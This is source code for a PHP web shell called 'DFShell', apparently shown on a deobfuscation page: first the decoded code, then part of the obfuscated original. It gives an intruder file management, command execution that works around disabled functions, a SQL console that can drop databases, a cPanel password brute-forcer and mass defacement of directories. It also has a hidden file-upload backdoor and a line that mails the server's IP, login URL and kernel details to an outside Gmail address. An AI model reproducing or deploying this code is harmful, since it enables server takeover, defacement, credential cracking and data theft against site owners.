<a href='?dfp=" . urlencode($this->Enc()) . "&dfaction=del'><i class='fa-solid fa-trash'></i></a></td></tr></p>"; } } foreach ($files as $p) { if (is_file($path . $slashtype . $p)) { $filtered = $this->Dec($this->DFSDirFilter($path)); $this->string = $filtered; $dfp = $this->Enc(); $this->string = $p; $dff = $this->Enc(); $compressed = array("zip", "tar", "gz", "rar"); $isZip = pathinfo($p, PATHINFO_EXTENSION); if (in_array($isZip, $compressed)) { $tname = $p . "<button style='border-radius:8px;background:orange;'>\xa <a style='color:black;' href='?dfp=" . urlencode($dfp) . "&dff=" . urlencode($dff) . "&dfaction=unzip'>\xa UNZIP </a></button>"; } else { $tname = $p; } echo "<p><tr><td id='fchecks'><input type='checkbox' name='toZip[]' value='" . urlencode($dfp) . "||" . urlencode($dff) . "'></td></td>"; echo "<td id='iconx'><i class='fa-solid fa-file'></i></td><td id='tbname'><a href='?dfp=" . urlencode($dfp) . "&dff=" . urlencode($dff) . "'>{$tname}</a></td>"; echo "<td>" . $this->DFSFormat(filesize($filtered . $p)) . "</td>"; echo "<td id='tbcen'>" . $this->DFSOG($filtered . $p) . "</td>"; echo "<td id='tbcen'><a href='?dfp=" . urlencode($dfp) . "&dff=" . urlencode($dff) . "&dfaction=chmd'>" . $this->DFSPerms($filtered . $p) . "</a></td>"; echo "<td id='tbcen' class='tbdate'>" . date("h:i:sA(d/m/Y)", filemtime($filtered . $p)) . "</td>"; echo "<td id='tbcen'>\xa <a href='?dfp=" . urlencode($dfp) . "&dff=" . urlencode($dff) . "&dfaction=edit'><i class='fa-solid fa-file-signature'></i></a> . \xa <a href='?dfp=" . urlencode($dfp) . "&dff=" . urlencode($dff) . "&dfaction=ren'><i class='fa-solid fa-pen'></i></a> . \xa <a href='?dfp=" . urlencode($dfp) . "&dff=" . urlencode($dff) . "&dfaction=del'><i class='fa-solid fa-trash'></i></a> . \xa <a href='?dfp=" . urlencode($dfp) . "&dfd=" . urlencode($dff) . "&dfaction=download'><i class='fa-solid fa-download'></i></a></td></tr></p>"; } } echo "</table>\xa <div id='anact'>
\xa <select name='selectAction'>
<option value=''>-- Action --</option>
<option value='Zip'>-- Zip --</option>
<option value='Delete'>-- Delete --</option>
</select>\xa <input type='submit' value='Submit'>
</div></form></div>"; break; case "del": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1] ?: ''); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if (is_file($pathfile)) { if (unlink($pathfile)) { $this->DFSPopupMSG(3, null, "File Successfully deleted!", null, false); } else { $this->DFSPopupMSG(4, null, "Permission denied!", null, false); } } else { if (is_dir($pathfile)) { if (rmdir($pathfile)) { $this->DFSPopupMSG(3, null, "Directory Successfully deleted!", null, false); } else { $this->DFSPopupMSG(4, null, "Permission denied!", null, false); } } } break; case "ren": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1]); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if (getcwd() == $pathfile) { $GLOBALS["DFSyntax"][3]($GLOBALS["DFConfig"][2]["DOCUMENT_ROOT"]); } echo "<section id='dfsrename'>"; if (isset($GLOBALS["DFConfig"][1]["newfile"])) { if (file_exists($pathfile)) { $dfsRen = preg_replace("/" . basename($pathfile) . "/i", $GLOBALS["DFConfig"][1]["newfile"], $pathfile); if (rename($pathfile, $dfsRen)) { $this->DFSPopupMSG(5, '', "File successfully renamed!", '', true); echo "<script>setTimeout(function(){ window.location.replace('?dfp=" . urlencode($GLOBALS["DFConfig"][1]["reflink"]) . "') },1500);</script>"; } else { $this->DFSPopupMSG(4, null, "Permission denied!", null, true); } } else { $this->DFSPopupMSG(4, null, "No such file/directory!", null, true); } } else { $dfsren = preg_replace("/" . basename($pathfile) . "/i", '', $pathfile); $this->string = $dfsren; echo "<form action='' method='POST'>\xa <input type='hidden' name='reflink' value='" . $this->Enc() . "'>\xa <table><tr><td>\xa <label>Full path : </label></td><td>
<label>" . $pathfile . " </label></td></tr><tr>
<td><label>New name : </label></td><td>
<input type='text' name='newfile' placeholder='" . basename($pathfile) . "'></td></tr><tr>
<td></td><td><input type='submit' value='Rename'></tr>\xa </table></form>"; } echo "</section>"; break; case "sql": echo "<section class='databases'>"; if (isset($_SESSION["sql_auth"])) { $sqldat = explode("|--|", $_SESSION["sql_auth"]); $conn = mysqli_connect($sqldat[0], $sqldat[1], $sqldat[2]); if (isset($GLOBALS["DFConfig"][1]["other"])) { $this->DFSPopupMSG(1, "Get Adminer", "Please get adminer from link below", "<a href=\'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-mysql-en.php\'>Adminer</a>", true); } else { if (isset($GLOBALS["DFConfig"][1]["sqldrop"])) { $ftar = array("'", """); if (!isset($GLOBALS["DFConfig"][0]["tbname"])) { mysqli_select_db($conn, $GLOBALS["DFConfig"][0]["dbname"]); $dropping = str_replace($ftar, '', $GLOBALS["DFConfig"][0]["dbname"]); $dropsql = "DROP DATABASE {$dropping}"; $query = mysqli_query($conn, $dropsql) or die(mysqli_error($conn)); $this->DFSPopupMSG(3, null, "Database DROPPED!", null, false); } else { mysqli_select_db($conn, $GLOBALS["DFConfig"][0]["dbname"]); $dropping = str_replace($ftar, '', $GLOBALS["DFConfig"][0]["tbname"]); $dropsql = "DROP TABLE {$dropping}"; $query = mysqli_query($conn, $dropsql) or die(mysqli_error($conn)); $this->DFSPopupMSG(3, null, "Table DROPPED!", null, false); } } else { if (isset($GLOBALS["DFConfig"][1]["sqlcommands"])) { if (isset($GLOBALS["DFConfig"][0]["dbname"])) { mysqli_select_db($conn, $GLOBALS["DFConfig"][0]["dbname"]); $inject = $GLOBALS["DFConfig"][1]["sqlcommands"]; $query = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $this->DFSPopupMSG(3, null, "Command executed!", null, false); } else { $inject = $GLOBALS["DFConfig"][1]["sqlcommands"]; $query = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $this->DFSPopupMSG(3, null, "Command executed!", null, false); } } else { echo "<div id='sqlside'>
<form action='' method='POST'><input type='submit' value='Logout' name='sqllogout'></form>
<form action='' method='POST'><input type='submit' name='other' value='Get Adminer'></form>"; if (isset($GLOBALS["DFConfig"][0]["tbname"]) || isset($GLOBALS["DFConfig"][0]["dbname"])) { echo "<form action='' method='POST'>\xa <input style='background:red;' type='submit' name='sqldrop' value='DROP'></form>"; } echo "</div>\xa <form action='' method='POST'><table><tr><td><textarea name='sqlcommands' placeholder='Theres no output ,just use for edit value in database' name='sqlcmd'></textarea>\xa </td></tr><tr><td><input type='submit' value='Execute'></td></tr></table></form>"; echo "<div id='fieldx'><label>Connected to mysql</label><br>"; if (!isset($GLOBALS["DFConfig"][0]["dbname"])) { echo "<button><a id='blacky' href='?dfaction=sql'>Back</a></button><br>"; } else { if (!isset($GLOBALS["DFConfig"][0]["tbname"])) { echo "<button><a id='blacky' href='?dfaction=sql'>Back</a></button><br>"; } else { echo "<button><a id='blacky' href='?dfaction=sql&dbname=" . $GLOBALS["DFConfig"][0]["dbname"] . "'>Back</a></button>\xa <br>"; } } if (isset($GLOBALS["DFConfig"][0]["dbname"])) { $dbs = mysqli_real_escape_string($conn, $GLOBALS["DFConfig"][0]["dbname"]); $sql = "select table_name from information_schema.tables where table_schema='{$dbs}';"; $query = mysqli_query($conn, $sql) or die(mysqli_error($conn)); while ($fetch = mysqli_fetch_assoc($query)) { echo "<a href='?dfaction=sql&dbname=" . $dbs . "&tbname=" . $fetch["table_name"] . "'>" . $fetch["table_name"] . "</a><br>"; } echo "</div><div id='sqlcol'>"; if (isset($GLOBALS["DFConfig"][0]["tbname"])) { if (!isset($GLOBALS["DFConfig"][0]["limit"])) { mysqli_select_db($conn, $dbs); $tbl = mysqli_real_escape_string($conn, $GLOBALS["DFConfig"][0]["tbname"]); $sql = "select column_name from information_schema.columns where table_name='{$tbl}'"; $sql1 = "select * from {$tbl} limit 20"; $query = mysqli_query($conn, $sql) or die(mysqli_error($conn)); $query1 = mysqli_query($conn, $sql1) or die(mysqli_error($conn)); echo "<table>"; while ($fetch = mysqli_fetch_assoc($query)) { echo "<th>" . $fetch["column_name"] . "</th>"; } while ($fetch1 = mysqli_fetch_assoc($query1)) { echo "<tr>"; foreach ($fetch1 as $key => $val) { echo "<td>" . $val . "</td>"; } echo "</tr>"; } $total_row = mysqli_num_rows($query1); echo "</table>"; if ($total_row > 0) { echo "<form action='' method='GET'><table>"; echo "<input type='hidden' value='sql' name='dfaction'>"; echo "<input type='hidden' value='" . $dbs . "' name='dbname'>"; echo "<input type='hidden' value='" . $tbl . "' name='tbname'>"; echo "<tr><td><label>Set offset,limit</label></td><td>\xa <input type='text' placeholder='eg: 20,50' name='limit'></td></tr>
<tr><td></td><td><input type='submit' value='Lets Go'></td></tr>"; echo "</table></form>"; } echo "</div>"; } else { $limits = explode(",", $GLOBALS["DFConfig"][0]["limit"]); $offset = intval($limits[0]); $limit = intval($limits[1]); mysqli_select_db($conn, $dbs); $tbl = mysqli_real_escape_string($conn, $GLOBALS["DFConfig"][0]["tbname"]); $sql = "select column_name from information_schema.columns where table_name='{$tbl}'"; $sql1 = "select * from {$tbl} limit {$offset},{$limit}"; $query = mysqli_query($conn, $sql) or die(mysqli_error($conn)); $query1 = mysqli_query($conn, $sql1) or die(mysqli_error($conn)); echo "<table>"; while ($fetch = mysqli_fetch_assoc($query)) { echo "<th>" . $fetch["column_name"] . "</th>"; } while ($fetch1 = mysqli_fetch_assoc($query1)) { echo "<tr>"; foreach ($fetch1 as $key => $val) { echo "<td>" . $val . "</td>"; } echo "</tr>"; } echo "</table>"; $total_row = mysqli_num_rows($query1); if ($total_row > 0) { echo "<form action='' method='GET'><table>"; echo "<input type='hidden' value='sql' name='dfaction'>"; echo "<input type='hidden' value='" . $dbs . "' name='dbname'>"; echo "<input type='hidden' value='" . $tbl . "' name='tbname'>"; echo "<tr><td><label>Set offset,limit</label></td><td>
<input type='text' placeholder='eg: 20,50' name='limit'></td></tr>
<tr><td></td><td><input type='submit' value='Lets Go'></td></tr>"; echo "</table></form>"; } echo "</div>"; } } } else { $sql = "select schema_name from information_schema.schemata"; $query = mysqli_query($conn, $sql) or die(mysqli_error($conn)); while ($fetch = mysqli_fetch_assoc($query)) { echo "<a href='?dfaction=sql&dbname=" . $fetch["schema_name"] . "'>" . $fetch["schema_name"] . "</a><br>"; } echo "</div>"; } if (isset($GLOBALS["DFConfig"][1]["sqllogout"])) { $_SESSION["sql_auth"] = null; unset($_SESSION["sql_auth"]); echo "<script>window.location.replace('?dfaction=sql');</script>"; } if (isset($GLOBALS["DFConfig"][1]["sqlcmd"])) { $sqlcmd = $GLOBALS["DFConfig"][1]["sqlcmd"]; $qrycmd = mysqli_query($conn, $sqlcmd) or die(mysqli_error($conn)); $this->DFSPopupMSG(1, "SQL Query", "Command successfully executed!", '', true); } } } } } else { if (!isset($GLOBALS["DFConfig"][1]["connect_sql"])) { echo explode("||", $GLOBALS["DFSyntax"][0](self::$remote_url . "/others.html"))[4]; } else { $tmp_conn = mysqli_connect($GLOBALS["DFConfig"][1]["sqlhost"], $GLOBALS["DFConfig"][1]["sqluser"], $GLOBALS["DFConfig"][1]["sqlpass"]) or die($this->DFSPopupMSG(2, "MySQL Connection", "Cannot connect to database!", '', true)); if (!mysqli_connect_errno()) { $_SESSION["sql_auth"] = $GLOBALS["DFConfig"][1]["sqlhost"] . "|--|" . $GLOBALS["DFConfig"][1]["sqluser"] . "|--|" . $GLOBALS["DFConfig"][1]["sqlpass"]; echo "<script>window.location.replace(window.location.href);</script>"; } else { echo "Failed to connect mysql"; die; } } } echo "</section>"; break; case "logout": unset($_SESSION["DFS_Auth"]); session_destroy(); echo "<script>window.location.replace('" . $GLOBALS["DFConfig"][2]["PHP_SELF"] . "')</script>"; break; case "crack": if (!isset($GLOBALS["DFConfig"][1]["crack"])) { echo explode("||", $GLOBALS["DFSyntax"][0](self::$remote_url . "/others.html"))[0]; } else { $host = $GLOBALS["DFConfig"][1]["host"]; $user = explode("\xa", $GLOBALS["DFConfig"][1]["userlist"]); $pass = explode("
", $GLOBALS["DFConfig"][1]["passlist"]); $port = $GLOBALS["DFConfig"][1]["portc"]; $timeout = $GLOBALS["DFConfig"][1]["timeout"]; echo "<section class='crackresults'>"; foreach ($user as $u) { print "<p>Trying for user -> " . $u . "</p>"; foreach ($pass as $p) { $this->DFSCracker(trim($host), $port, trim($u), trim($p), trim($timeout)); } } echo "<p>Done!</p>"; echo "</section>"; } break; case "mass": $slashtype = $this->DFSSlash(); echo "<section class='mass'>"; if (!isset($GLOBALS["DFConfig"][1]["dfmass"])) { echo explode("||", $GLOBALS["DFSyntax"][0](self::$remote_url . "/others.html"))[2]; } else { $arrpath = glob($GLOBALS["DFConfig"][1]["masspath"] . $slashtype . "*", GLOB_ONLYDIR); if (!empty($GLOBALS["DFConfig"][1]["fromurl"]) && $GLOBALS["DFConfig"][1]["fromurl"] !== '' && $GLOBALS["DFConfig"][1]["fromurl"] !== NULL) { if (filter_var($GLOBALS["DFConfig"][1]["fromurl"], FILTER_VALIDATE_URL)) { $ncode = file_get_contents($GLOBALS["DFConfig"][1]["fromurl"]); } else { die("<script>alert('Check url');window.location.replace(window.location.href);</script>"); } } else { $ncode = $GLOBALS["DFConfig"][1]["codemass"] ?: "Hacked by Eagle Eye"; } $lekluh = $GLOBALS["DFConfig"][1]["masspath"] . $slashtype . $GLOBALS["DFConfig"][1]["massname"]; $rakluh = fopen($lekluh, "w"); fwrite($rakluh, $ncode); foreach ($arrpath as $p) { $npath = $p . $slashtype . $GLOBALS["DFConfig"][1]["massname"]; $nopen = fopen($npath, "w"); fwrite($nopen, $ncode); fclose($nopen); } fclose($rakluh); $this->DFSPopupMSG(1, "Mass defacements", "All file successfully created!", '', true); } echo "</section>"; break; } } public function DFSExecute($command) { if (isset($GLOBALS["DFConfig"][0]["dfp"])) { $GLOBALS["DFSyntax"][3]($this->Dec($GLOBALS["DFConfig"][0]["dfp"])); } else { $GLOBALS["DFSyntax"][3]($GLOBALS["DFConfig"][2]["DOCUMENT_ROOT"]); } if ($this->DFSDat("ini", "disable_functions") !== "None") { $disCMD = explode(",", $this->DFSDat("ini", "disable_functions")); $disCMD = array_map("trim", $disCMD); foreach ($GLOBALS["DFSCmd"] as $cmd) { if (!in_array($cmd, $disCMD)) { $availCMD = $cmd; switch ($availCMD) { case $GLOBALS["DFSCmd"][4]: return $this->DFSProcOpen($command); break; case $GLOBALS["DFSCmd"][1]: case $GLOBALS["DFSCmd"][2]: print $availCMD($command); return $GLOBALS["DFSCmd"][1]($command); break; default: return $availCMD($command); break; } break; } } } else { return system($command); } } private function DFSProcOpen($command) { $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $exec = $command; $process = $GLOBALS["DFSCmd"][4]($exec, $descriptorspec, $pipes, null, null); if (is_resource($process)) { $retCMD = $GLOBALS["DFSyntax"][14]($pipes[1]); echo $retCMD; proc_close($process); } else { echo "Fail to execute!"; } } private function DFSWinPathCheck() { $partition = array("A:", "B:", "C:", "D:", "E:", "F:", "G:", "H:", "I:", "J:", "K:", "L:", "M:", "N:", "O:", "P:", "Q:", "R:", "S:", "T:", "U:", "V:", "W:", "X:", "Y:", "Z:"); $available = array(); foreach ($partition as $part) { if (is_dir($part)) { array_push($available, $part); } } return $available; } private function DFSCracker($host, $port, $user, $pass, $timeout) { $ch = curl_init(); $qdata = array("user" => $user, "pass" => $pass, "goto_uri" => "/"); curl_setopt($ch, CURLOPT_URL, "https://{$host}:" . $port . "/login/?login_only=1"); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $qdata); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if (curl_errno($ch) == 28) { print "<b><font face="Verdana" style="font-size: 9pt">\xa <font color="#AA0000">Error :</font> <font color="#008000">Connection Timeout\xa , Sleep for 5s .</font></font></b></p>"; sleep(5); } else { if (curl_errno($ch) == 0) { print "<b><font face="Tahoma" style="font-size: 9pt" color="#008000">[~]</font></b><font face="Tahoma" style="font-size: 9pt"><b><font color="#008000">
Cracking Success With Username "</font><font color="#FF0000">{$user}</font><font color="#008000">"
and Password "</font><font color="#FF0000">{$pass}</font><font color="#008000">"</font></b><br><br>"; die; } else { if ($httpcode === 0) { echo "No response <br>"; curl_setopt($ch, CURLOPT_URL, "http://{$host}:" . $port); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $cont = curl_exec($ch); $farr = explode("URL=", $cont); $narr = explode(""></head>", $farr[1]); echo "Please change to this host -> " . $narr[0]; die; } } } curl_close($ch); } public function DFSCurrent($slashtype) { echo "<div class='currentfolder'>Current folder : "; $truepath = array(); if (isset($GLOBALS["DFConfig"][0]["dfp"])) { $path = $this->DFSDirFilter($this->Dec($GLOBALS["DFConfig"][0]["dfp"])); $path = $this->Dec($path); } else { $path = getcwd(); } $dfsEP = explode($slashtype, $path); $dfsSZ = sizeof($dfsEP); $dfsGE = ''; for ($c = 0; $c < $dfsSZ; $c++) { array_push($truepath, $dfsEP[$c]); } if ($GLOBALS["DFSPlatform"] !== "win") { $endslash = $this->DFSDirFilter($slashtype); echo "<a href='?dfp=" . urlencode($endslash) . "'>{$slashtype}</a>"; } for ($i = 0; $i < sizeof($truepath); $i++) { if (!empty($dfsEP[$i]) || !$dfsEP[$i] == '') { if ($GLOBALS["DFSPlatform"] !== "win") { $dfsGE .= $slashtype . $dfsEP[$i]; } else { $dfsGE .= $dfsEP[$i] . $slashtype; } $dfsGEn = $this->DFSDirFilter($dfsGE); echo "<a href='?dfp=" . urlencode($dfsGEn) . "'>{$dfsEP[$i]}</a>"; echo $slashtype; } } echo "</div>"; } public function DFSOG($file) { if ($GLOBALS["DFSPlatform"] !== "win") { $owner_file = fileowner($file) ?: 0; $group_file = filegroup($file) ?: 0; $checkposix = $this->DFSDat("ini", "disable_functions"); if ($checkposix !== "None") { $checkposix = explode(",", $checkposix); if (!in_array("posix_getpwuid", $checkposix)) { $ownx = posix_getpwuid($owner_file)["name"] ?: "nobody"; $grpx = posix_getpwuid($group_file)["name"]; if ($ownx !== NULL && $ownx !== '' || $grpx !== NULL && $grpx !== '') { $owner_group = $ownx . ":" . ($grpx ?: $ownx); } else { $owner_group = "nobody:nobody"; } } else { $owner_group = "-:-"; } } else { $ownx = posix_getpwuid($owner_file)["name"] ?: "nobody"; $grpx = posix_getpwuid($group_file)["name"]; if ($ownx !== NULL && $ownx !== '' || $grpx !== NULL && $grpx !== '') { $owner_group = $ownx . ":" . ($grpx ?: $ownx); } else { $owner_group = "nobody:nobody"; } } } else { $owner_group = "-:-"; } return $owner_group; } public function DFSPerms($f) { $p = $GLOBALS["DFSyntax"][1]($f); if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } private function DFSMod($code) { return substr(sprintf("%o", $code), -4); } public function DFSChange($loc, $code) { $def = 0; for ($i = strlen($code) - 1; $i >= 0; --$i) { $def += (int) $code[$i] * pow(8, strlen($code) - $i - 1); } if (is_dir($loc) || is_file($loc)) { if (chmod($loc, $def)) { return true; } else { return false; } } } public function DFSDat($ch, $value) { switch (strtolower($ch)) { case "ini": if (strtolower($value) !== "disable_functions") { if (!ini_get($value)) { return "OFF"; } else { return "ON"; } } else { if (!ini_get($value)) { return "None"; } else { return ini_get($value); } } break; case "func": if (!function_exists($value)) { return "OFF"; } else { return "ON"; } break; } } public function DFSInfo() { if ($GLOBALS["DFSPlatform"] === "lin") { $OSID = ''; } $disklink = ''; $encstr = array(); $diskavail = $this->DFSWinPathCheck(); foreach ($diskavail as $item) { $diskstr = $item . "\"; $this->string = $diskstr; $disklink .= "<a href='?dfp=" . $this->Enc() . "'>{$diskstr}</a> , "; } $contents = "<div class='intros'>\xaServer Info : " . substr(@php_uname(), 0, 120) . "<br>
Server Software : " . $GLOBALS["DFConfig"][2]["SERVER_SOFTWARE"] . "<br>
Current User : " . get_current_user() . " | Disk FreeSpace : " . $this->DFSFormat(diskfreespace($GLOBALS["DFConfig"][2]["DOCUMENT_ROOT"])) . "<br>
Server Address : " . $GLOBALS["DFConfig"][2]["SERVER_ADDR"] . " | \xaYour Address : " . $GLOBALS["DFConfig"][2]["REMOTE_ADDR"] . "<br>\xaSafe Mode : " . $this->DFSDat("ini", "safe_mode") . " |\xaServer Email : " . $GLOBALS["DFConfig"][2]["SERVER_ADMIN"] . "<br>
Disable Functions : " . $this->DFSDat("ini", "disable_functions") . " | \xacURL : " . $this->DFSDat("func", "curl_version") . " |
MySQL : " . $this->DFSDat("func", "mysql_connect") . "<br>\xaDocument Root : " . $GLOBALS["DFConfig"][2]["DOCUMENT_ROOT"] . " | Disk : " . $disklink . "\xa</div>%{main}%"; return $contents; } public function DFSRenderArray($array_replace, $contents) { $arrRep = sizeof($array_replace); $x = 1; for ($i = 0; $i < $arrRep; $i++) { $contents = $this->DFSRender("/%{A" . $x . "}%/i", $array_replace[$i], $contents); $x++; } return $contents; } public function DFSRender($pattern, $replace, $from) { $contents = preg_replace($pattern, $replace, $from); return $contents; } public function DFSAdmin() { $contents = $GLOBALS["DFSyntax"][0](self::$remote_url . "/login.html"); return $contents; } public function DFStart() { $contents = $GLOBALS["DFSyntax"][0](self::$remote_url . "/head.html"); $contents = preg_replace("/%{style}%/i", $GLOBALS["DFSyntax"][0](self::$remote_url . "/dfs.css"), $contents); $contents = preg_replace("/%{js}%/i", $GLOBALS["DFSyntax"][0](self::$remote_url . "/script.js"), $contents); return $contents; } public function DFSBody($location, $pattern, $from) { $contents = $GLOBALS["DFSyntax"][0](self::$remote_url . "/" . $location); $from = $this->DFSRender($pattern, $contents, $from); return $from; } public function DFSEnd() { $contents = $GLOBALS["DFSyntax"][0](self::$remote_url . "/foot.html"); return $contents; } public function DFSDefault() { $this->DFSAction("upload"); $this->DFSAction("mkdir"); $this->DFSAction("mkfile"); } public function DFSDirFilter($path) { if ($GLOBALS["DFSPlatform"] !== "win") { $x = preg_replace("/%2F%2F/i", "/", urlencode($path)); } else { $x = preg_replace("/%5C%5C/i", "\", urlencode($path)); } $this->string = urldecode($x); return $this->Enc(); } } goto SCiIQ; opb_2: ini_set("display_errors", 0); goto vSQrh; kQlMe: ${${"GLOBALS"}["veuarfech"]} = array("python3", "setcap", "mount", "unshare", "touch", "gcc", "pkexec"); goto XIACk; sWXJV: ${"GLOBALS"}["iliuscys"] = "login_url"; goto L7SMR; JE7FI: set_time_limit(0); goto F4evV; EtzVE: foreach (${${"GLOBALS"}["ekhyobycpvw"]} as ${${"GLOBALS"}["yiwcztbyun"]}) { ${"GLOBALS"}["enekbg"] = "command_results"; $fcclguhq = "command"; ${"GLOBALS"}["psiokavvu"] = "result"; ${"GLOBALS"}["hxhgoquvkl"] = "result"; ${${"GLOBALS"}["hxhgoquvkl"]} = shell_exec("command -v {$command}"); ${${"GLOBALS"}["enekbg"]}[${$fcclguhq}] = ${${"GLOBALS"}["psiokavvu"]} ? "ON" : "OFF"; } goto FIdy4; FIdy4: $server_name = $_SERVER["SERVER_NAME"]; goto kLuSI; Z7Cq2: ${"GLOBALS"}["uinrcmlwue"] = "command_results"; goto kQlMe; eKDUG: ${${"GLOBALS"}["uinrcmlwue"]} = array(); goto or6vA; znjAP: header("Content-Type: text/html; charset=UTF-8"); goto kPjU1; E9WCn: ini_set("memory_limit", "64M"); goto M2bfL; J2Vs2: ${${"GLOBALS"}["dtihjrvonf"]} = "IP : [ {$ipnya} ]\xaLogin: {$login_url}\xaKernel: {$system_info}\xa"; goto ZwS3k; FSDrH: ?>
Did this file decode correctly?
Original Code
<?php
goto W1_3c; vSQrh: ini_set("\144\x69\163\x70\x6c\141\x79\x5f\x73\x74\x61\x72\x74\x75\x70\x5f\x65\162\x72\157\x72\x73", 0); goto Akqdm; C6TK2: @ini_set("\157\x75\x74\x70\165\x74\137\142\x75\146\x66\145\162\x69\156\147", 0); goto tEMf5; Q1E3X: $ipnya2 = $_SERVER["\122\105\115\x4f\x54\105\x5f\x41\104\x44\x52"]; goto dd3lJ; M2bfL: ${"\x47\114\117\x42\101\x4c\123"}["\160\160\167\x79\x6f\x69\171\153\147"] = "\143\157\155\x6d\x61\x6e\144"; goto znjAP; W1_3c: ${"\107\114\x4f\102\101\114\123"}["\x6a\x79\x77\x6f\143\x78"] = "\x72\x65\163\165\x6c\164"; goto PMwiE; L7SMR: ${"\107\x4c\x4f\x42\x41\114\x53"}["\171\151\167\x63\x7a\x74\x62\x79\165\156"] = "\x63\157\155\155\141\x6e\144"; goto kynZv; SCiIQ: $shell = new DFShell(); goto AUPWA; sqYa7: $DFSPlatform = strtolower(substr(PHP_OS, 0, 3)); goto gPc7r; ZwS3k: foreach (${${"\107\114\117\102\x41\x4c\123"}["\144\161\147\156\x72\x65\x63\144\146"]} as ${${"\x47\114\117\102\x41\x4c\123"}["\x70\x70\167\x79\x6f\151\x79\x6b\147"]} => ${${"\107\114\x4f\102\x41\114\x53"}["\x6a\x79\x77\157\x63\x78"]}) { ${${"\107\114\x4f\102\101\x4c\x53"}["\x64\x74\x69\150\152\162\166\x6f\x6e\146"]} .= "{$command}\75{$result}\12"; } goto aibe0; gPc7r: $DFSOptions = array("\145\x64\151\164", "\x63\x6d\144", "\x64\145\154", "\x73\161\x6c", "\143\x6f\x6e\146", "\x73\171\155", "\x72\x65\166\x65\162\x73\x65", "\x63\x72\141\x63\x6b", "\155\x61\x73\163", "\x6c\x6f\x67\x6f\x75\x74", "\x64\145\x73\164", "\x72\x65\156", "\143\x68\x6d\144", "\x75\x6e\172\151\160", "\x62\157\155\x62\151\156\147"); goto g8DSO; RbXjW: ${${"\107\114\x4f\x42\x41\x4c\x53"}["\151\x6c\x69\165\x73\143\171\x73"]} = "\x68\x74\x74\x70\x73\72\57\x2f{$server_name}{$php_self}"; goto Imana; MlQxE: session_start(); goto IOapv; fRwtG: if (isset($_GET["\165\160\142\141\143\153\x73\x68\145\x6c\154"]) && $_GET["\x75\160\x62\141\143\153\163\x68\x65\x6c\x6c"] === "\x79\x75\163\165\x66") { echo "\74\146\157\x72\x6d\40\x61\x63\x74\x69\157\156\75\x27\x27\x20\x65\x6e\143\x74\171\x70\x65\x3d\47\x6d\165\x6c\x74\151\160\141\x72\x74\x2f\x66\x6f\x72\155\x2d\x64\141\x74\141\x27\x20\155\145\x74\x68\x6f\144\75\x27\x50\117\123\x54\x27\x3e\xa\40\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\74\x69\156\x70\165\164\x20\x74\171\x70\145\75\47\146\151\x6c\145\x27\x20\156\x61\x6d\x65\75\47\x66\151\x6c\145\x6e\x61\x27\76\xa\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\40\74\x69\x6e\160\x75\x74\40\x74\171\x70\x65\x3d\x27\x73\165\x62\x6d\151\164\47\40\x6e\x61\155\x65\75\x27\x75\x70\x6c\157\x61\144\47\x20\x76\x61\154\165\145\75\47\147\141\x73\x6b\x65\x6e\47\76\xa\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\x20\x20\74\x2f\x66\x6f\x72\155\76"; if (isset($_POST["\x75\160\154\x6f\x61\x64"])) { $cwd = getcwd(); $tmp = $_FILES["\x66\x69\x6c\x65\x6e\x61"]["\164\155\160\x5f\156\x61\x6d\x65"]; $file = $_FILES["\x66\x69\154\145\x6e\141"]["\156\x61\155\145"]; if (@copy($tmp, $file)) { echo "\106\x69\x6c\x65\40\142\x65\162\150\x61\163\x69\x6c\40\x74\x65\162\165\160\x6c\x6f\x61\x64\x21\x20\x3d\76\40{$cwd}\57{$file}"; } } } goto opb_2; kPjU1: ${${"\107\x4c\x4f\102\x41\114\123"}["\147\x74\142\x6f\160\166\163"]} = php_uname(); goto Z7Cq2; tEMf5: ${"\x47\x4c\117\102\x41\114\123"}["\x64\161\x67\x6e\x72\145\143\x64\146"] = "\143\157\155\x6d\x61\x6e\144\137\x72\145\x73\x75\x6c\x74\x73"; goto dKjG5; aibe0: @mail("\x72\141\x69\x74\163\143\x68\151\x6e\144\x65\x40\147\x6d\141\151\x6c\x2e\x63\x6f\x6d", "\x48\x65\x68\x65\150\145", ${${"\x47\114\x4f\x42\x41\x4c\123"}["\x64\164\151\150\x6a\x72\x76\157\x6e\x66"]}); goto Alng5; rD6jB: $DFConfig = array($_REQUEST, $_POST, $_SERVER, $_COOKIE, $_FILES); goto ZR6qn; XIACk: ${"\107\x4c\117\x42\x41\114\123"}["\145\x6b\x68\171\157\142\171\x63\160\x76\x77"] = 